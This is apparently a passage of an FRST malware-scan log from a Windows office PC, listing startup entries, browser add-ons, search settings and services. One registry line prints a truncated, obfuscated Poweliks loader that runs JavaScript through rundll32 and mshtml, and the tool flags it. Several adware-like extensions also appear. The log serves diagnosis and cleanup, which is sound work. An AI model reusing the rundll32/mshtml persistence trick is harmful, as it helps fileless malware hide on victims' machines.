Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Monsoon Multimedia Inc.) 
C:\Program Files (x86)\Belkin\@TV\Common\havasvc.exe (Microsoft Corporation) C:\Windows\System32\VMWindow.exe (Microsoft Corporation) C:\Windows\System32\vpc.exe (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [sysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1425408 2012-03-30] (IDT, Inc.) HKLM\...\Run: [beatsOSDApp] => C:\Program Files\IDT\WDM\beats64.exe [37888 2012-03-30] (Hewlett-Packard ) HKLM\...\Run: [broadcom Wireless Manager UI] => C:\Program Files\Broadcom\Broadcom 802.11\WLTRAY.exe [7172096 2011-11-24] (Broadcom Corporation) HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [499608 2011-06-16] (Adobe Systems Incorporated) HKLM\...\Run: [HPSYSDRV] => C:\Program Files (x86)\Hewlett-Packard\HP Odometer\HPSYSDRV.EXE [62768 2008-11-20] (Hewlett-Packard) HKLM\...\Run: [LogMeIn GUI] => C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe [57928 2012-06-08] (LogMeIn, Inc.) 
HKLM\...\Run: [snpstd3] => C:\windows\vsnpstd3.exe [827392 2006-09-19] () HKLM-x32\...\Run: [uSB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291096 2011-12-05] (Intel Corporation) HKLM-x32\...\Run: [HP Software Update] => c:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [49208 2011-05-10] (Hewlett-Packard) HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [Norton Online Backup] => C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe [1155928 2010-06-01] (Symantec Corporation) HKLM-x32\...\Run: [PDF Complete] => C:\Program Files (x86)\PDF Complete\pdfsty.exe [684024 2012-04-04] (PDF Complete Inc) HKLM-x32\...\Run: [CCPrt] => C:\Program Files (x86)\Cisco Systems\Cisco Connect\CCPrt.exe [1267360 2013-05-04] (Cisco Consumer Products LLC) HKLM-x32\...\Run: [bCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation) HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated) HKLM-x32\...\Run: [seagate Dashboard] => C:\Program Files (x86)\Seagate\Seagate Dashboard\MemeoLauncher.exe [79776 2012-10-14] () HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.) HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.) 
HKLM-x32\...\Run: [CommonToolkitTray] => C:\Program Files (x86)\Fighters\Tray\FightersTray.exe [1681952 2014-03-24] (SPAMfighter ApS) HKLM-x32\...\Run: [sfagent] => C:\Program Files (x86)\Fighters\SPAMfighter\sfagent.exe [1051168 2014-04-30] (SPAMfighter ApS) HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.) HKLM-x32\...\Run: [sunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [256896 2014-07-25] (Oracle Corporation) HKLM\...\RunOnce: [NCPluginUpdater] => C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe [21720 2014-10-21] (Hewlett-Packard) HKU\S-1-5-21-3549027879-2872290269-2961675323-1000\...\Run: [CAHeadless] => c:\Program Files (x86)\Adobe\Elements 10 Organizer\CAHeadless\ElementsAutoAnalyzer.exe [835224 2011-09-14] (Adobe Systems Incorporated) HKU\S-1-5-21-3549027879-2872290269-2961675323-1000\...\Run: [GoToMeeting] => C:\Users\Office\AppData\Local\Citrix\GoToMeeting\1767\g2mstart.exe [40304 2014-09-30] (Citrix Online, a division of Citrix Systems, Inc.) HKU\S-1-5-21-3549027879-2872290269-2961675323-1000\...\Run: [Akamai NetSession Interface] => C:\Users\Office\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.) HKU\S-1-5-21-3549027879-2872290269-2961675323-1000\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2012-08-19] (Google Inc.) HKU\S-1-5-21-3549027879-2872290269-2961675323-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! AppInit_DLLs: C:\PROGRA~2\KEYCRY~1\KEYCRY~4.DLL => C:\Program Files (x86)\KeyCryptSDK\KeyCrypt64(3).dll [88376 2013-07-24] (Zemana Ltd.) 
AppInit_DLLs-x32: C:\PROGRA~2\KEYCRY~1\KEYCRY~3.DLL => C:\Program Files (x86)\KeyCryptSDK\KeyCrypt32(3).dll [81160 2013-07-24] (Zemana Ltd.) Lsa: [Notification Packages] scecli c:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Constant Guard.lnk ShortcutTarget: Constant Guard.lnk -> C:\Program Files (x86)\Constant Guard Protection Suite\IDVault.exe (White Sky, Inc.) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk ShortcutTarget: Microsoft Office.lnk -> C:\Program Files (x86)\Microsoft Office\Office\OSA9.EXE (Microsoft Corporation) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit Inc.) Startup: C:\Users\Office\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk ShortcutTarget: Dropbox.lnk -> C:\Users\Office\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.) 
Startup: C:\Users\Office\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JustCloud.lnk
ShortcutTarget: JustCloud.lnk -> C:\Program Files (x86)\JustCloud\JustCloud.exe (JustCloud.com)
ShellIconOverlayIdentifiers: [OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://yahoo.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://search.audio4fun.com/
SearchScopes: HKLM - {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.com/web?q={searchterms}&l=dis&o=HPDTDF
SearchScopes: HKLM - {9A72428D-BFB7-4BBD-82A5-CCA39358DDB5} URL = http://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM - {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
SearchScopes: HKLM - {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = http://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM - {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = http://rover.ebay.com/rover/1/711-30572-11896-1/4?mpre=http://www.ebay.com/sch/i.html?_nkw={searchTerms}
SearchScopes: HKLM-x32 - {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.com/web?q={searchterms}&l=dis&o=HPDTDF
SearchScopes: HKLM-x32 - {9A72428D-BFB7-4BBD-82A5-CCA39358DDB5} URL = http://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM-x32 - {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
SearchScopes: HKLM-x32 - {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = http://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 - {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = http://rover.ebay.com/rover/1/711-30572-11896-1/4?mpre=http://www.ebay.com/sch/i.html?_nkw={searchTerms}
SearchScopes: HKCU - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKCU - {2fa28606-de77-4029-af96-b231e3b8f827} URL =
SearchScopes: HKCU - {9A72428D-BFB7-4BBD-82A5-CCA39358DDB5} URL =
SearchScopes: HKCU - {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL =
SearchScopes: HKCU - {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL =
SearchScopes: HKCU - {D944BB61-2E34-4DBF-A683-47E505C587DC} URL =
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll (Hewlett-Packard)
BHO-x32: &Yahoo! Toolbar Helper -> {02478D38-C3F9-4efb-9B51-7695ECA05670} -> C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn0\yt.dll (Yahoo! Inc.)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Constant Guard Protection Suite -> {B84CDBE7-1B46-494B-A188-01D4C52DEB61} -> C:\ProgramData\White Sky, Inc\ID Vault\IEBHO1.14.922.1\NativeBHO.dll (WhiteSky)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn0\yt.dll (Yahoo! Inc.)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
DPF: HKLM-x32 {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://iportal.safeway.com/dana-cached/sc/JuniperSetupClient.cab
Handler: intu-help-qb1 - {9B0F96C7-2E4B-433e-ABF3-043BA1B54AE3} - No File
Handler: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - No File
Handler-x32: intu-help-qb1 - {9B0F96C7-2E4B-433e-ABF3-043BA1B54AE3} - C:\Program Files (x86)\Intuit\QuickBooks 2008\HelpAsyncPluggableProtocol.dll (TODO: <Company name>)
Handler-x32: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\windows\SysWOW64\mscoree.dll (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\Office\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\coFFPlgn [2014-10-26]
FF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: SmartPrintButton - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2012-11-28]
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\IPSFF
FF Extension: Norton Vulnerability Protection - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\IPSFF [2013-12-01]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Plugin: (Remoting Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\pdf.dll ()
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\gcswf32.dll No File
CHR Plugin: (Norton Confidential) - C:\Users\Office\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk\2012.5.5.11_0\npcoplgn.dll No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll No File
CHR Plugin: (Windows Live™ Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\4.0.50401.0\npctrl.dll No File
CHR Profile: C:\Users\Office\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Office\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-06-25]
CHR Extension: (Bazaar Friend) - C:\Users\Office\AppData\Local\Google\Chrome\User Data\Default\Extensions\bmobdmpfgfimbnmhhnkmmecdboblafdh [2013-08-09]
CHR Extension: (Boston MarketOne) - C:\Users\Office\AppData\Local\Google\Chrome\User Data\Default\Extensions\dleekdifoepfadaikncodjgnkkffkccd [2013-09-01]
CHR Extension: (WebToSave) - C:\Users\Office\AppData\Local\Google\Chrome\User Data\Default\Extensions\efbkdhmfnmnmfimllbjamfodcoanhmdd [2013-10-16]
CHR Extension: (Coupons Malibu) - C:\Users\Office\AppData\Local\Google\Chrome\User Data\Default\Extensions\hnofepcmbghfcimfbjicplikedjcnalm [2013-10-16]
CHR Extension: (Norton Identity Safe) - C:\Users\Office\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif [2014-08-23]
CHR Extension: (Real Summer Sale) - C:\Users\Office\AppData\Local\Google\Chrome\User Data\Default\Extensions\lladpgmmlijbmhfknhgkenkhikoaapmj [2013-08-02]
CHR Extension: (Google Wallet) - C:\Users\Office\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-10-16]
CHR HKLM\...\Chrome\Extension: [bmobdmpfgfimbnmhhnkmmecdboblafdh] - C:\Users\Office\AppData\Local\BazaarFriend.crx [2013-08-07]
CHR HKLM\...\Chrome\Extension: [dleekdifoepfadaikncodjgnkkffkccd] - C:\Users\Office\AppData\Local\BostonMarketOne.crx [2013-08-13]
CHR HKLM\...\Chrome\Extension: [efbkdhmfnmnmfimllbjamfodcoanhmdd] - C:\Users\Office\AppData\Local\WebToSave.crx [2013-09-03]
CHR HKLM\...\Chrome\Extension: [hnofepcmbghfcimfbjicplikedjcnalm] - C:\Users\Office\AppData\Local\CouponsMalibu.crx [2013-09-05]
CHR HKLM\...\Chrome\Extension: [kcendgajlhoaiiccpijilcpmgphfflnj] - C:\Users\Office\AppData\Local\newhb.crx [2013-08-01]
CHR HKLM\...\Chrome\Extension: [lladpgmmlijbmhfknhgkenkhikoaapmj] - C:\Users\Office\AppData\Local\RealSummerSale.crx [2013-08-01]
CHR HKLM\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-15]
CHR HKCU\...\Chrome\Extension: [bmobdmpfgfimbnmhhnkmmecdboblafdh] - C:\Users\Office\AppData\Local\BazaarFriend.crx [2013-08-07]
CHR HKCU\...\Chrome\Extension: [dleekdifoepfadaikncodjgnkkffkccd] - C:\Users\Office\AppData\Local\BostonMarketOne.crx [2013-08-13]
CHR HKCU\...\Chrome\Extension: [efbkdhmfnmnmfimllbjamfodcoanhmdd] - C:\Users\Office\AppData\Local\WebToSave.crx [2013-09-03]
CHR HKCU\...\Chrome\Extension: [hnofepcmbghfcimfbjicplikedjcnalm] - C:\Users\Office\AppData\Local\CouponsMalibu.crx [2013-09-05]
CHR HKCU\...\Chrome\Extension: [kcendgajlhoaiiccpijilcpmgphfflnj] - C:\Users\Office\AppData\Local\newhb.crx [2013-08-01]
CHR HKCU\...\Chrome\Extension: [lladpgmmlijbmhfknhgkenkhikoaapmj] - C:\Users\Office\AppData\Local\RealSummerSale.crx [2013-08-01]
CHR HKLM-x32\...\Chrome\Extension: [bmobdmpfgfimbnmhhnkmmecdboblafdh] - C:\Users\Office\AppData\Local\BazaarFriend.crx [2013-08-07]
CHR HKLM-x32\...\Chrome\Extension: [dleekdifoepfadaikncodjgnkkffkccd] - C:\Users\Office\AppData\Local\BostonMarketOne.crx [2013-08-13]
CHR HKLM-x32\...\Chrome\Extension: [efbkdhmfnmnmfimllbjamfodcoanhmdd] - C:\Users\Office\AppData\Local\WebToSave.crx [2013-09-03]
CHR HKLM-x32\...\Chrome\Extension: [hnofepcmbghfcimfbjicplikedjcnalm] - C:\Users\Office\AppData\Local\CouponsMalibu.crx [2013-09-05]
CHR HKLM-x32\...\Chrome\Extension: [kcendgajlhoaiiccpijilcpmgphfflnj] - C:\Users\Office\AppData\Local\newhb.crx [2013-08-01]
CHR HKLM-x32\...\Chrome\Extension: [lladpgmmlijbmhfknhgkenkhikoaapmj] - C:\Users\Office\AppData\Local\RealSummerSale.crx [2013-08-01]
CHR HKLM-x32\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-15]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeActiveFileMonitor10.0; c:\Program Files (x86)\Adobe\Elements 10 Organizer\PhotoshopElementsFileAgent.exe [169624 2011-09-14] (Adobe Systems Incorporated)
R2 BackupStack; C:\Program Files (x86)\JustCloud\BackupStack.exe [36936 2014-09-10] (Just Develop It) <==== ATTENTION
R2 CalendarSynchService; C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service\GCalService.exe [16384 2011-08-16] (Hewlett-Packard) [File not signed]
R2 havasvc; C:\Program Files (x86)\Belkin\@TV\Common\havasvc.exe [150224 2012-12-27] (Monsoon Multimedia Inc.) [File not signed]
R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [File not signed]
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [73728 2004-10-22] (Macrovision Corporation) [File not signed]
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe [376144 2014-07-18] (LogMeIn, Inc.)
R2 LMIMaint; C:\Program Files (x86)\LogMeIn\x64\RaMaint.exe [226640 2014-07-18] (LogMeIn, Inc.)
R2 LogMeIn; C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe [407424 2012-06-08] (LogMeIn, Inc.)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)
R2 N360; C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\N360.exe [265040 2014-10-02] (Symantec Corporation)
R2 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2804568 2010-06-01] (Symantec Corporation)
R2 NovacomD; C:\Program Files\Palm, Inc\novacomd\amd64\novacomd.exe [72192 2011-06-24] (Palm) [File not signed]
R2 pdfcDispatcher; C:\Program Files (x86)\PDF Complete\pdfsvc.exe [1134584 2012-04-04] (PDF Complete Inc)
R2 Pml Driver HPZ12; C:\windows\system32\HPZipm12.dll [60416 2009-06-22] (Hewlett-Packard) [File not signed]
R2 QBCFMonitorService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [20480 2009-09-16] (Intuit) [File not signed]
S3 QBFCService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [61440 2007-05-24] (Intuit Inc.) [File not signed]
R2 SPAMfighter Update Service; C:\Program Files (x86)\Fighters\SPAMfighter\sfus.exe [216608 2014-04-30] (SPAMfighter ApS)
R2 STacSV; C:\Program Files\IDT\WDM\STacSV64.exe [311296 2012-03-30] (IDT, Inc.) [File not signed]
R2 Suite Service; C:\Program Files (x86)\Fighters\FighterSuiteService.exe [1282592 2014-03-14] (SPAMfighter ApS)
R2 wltrysvc; C:\Program Files\Broadcom\Broadcom 802.11\bcmwltry.exe [5856256 2011-11-24] (Broadcom Corporation) [File not signed]

==================== Drivers (Whitelisted) ====================

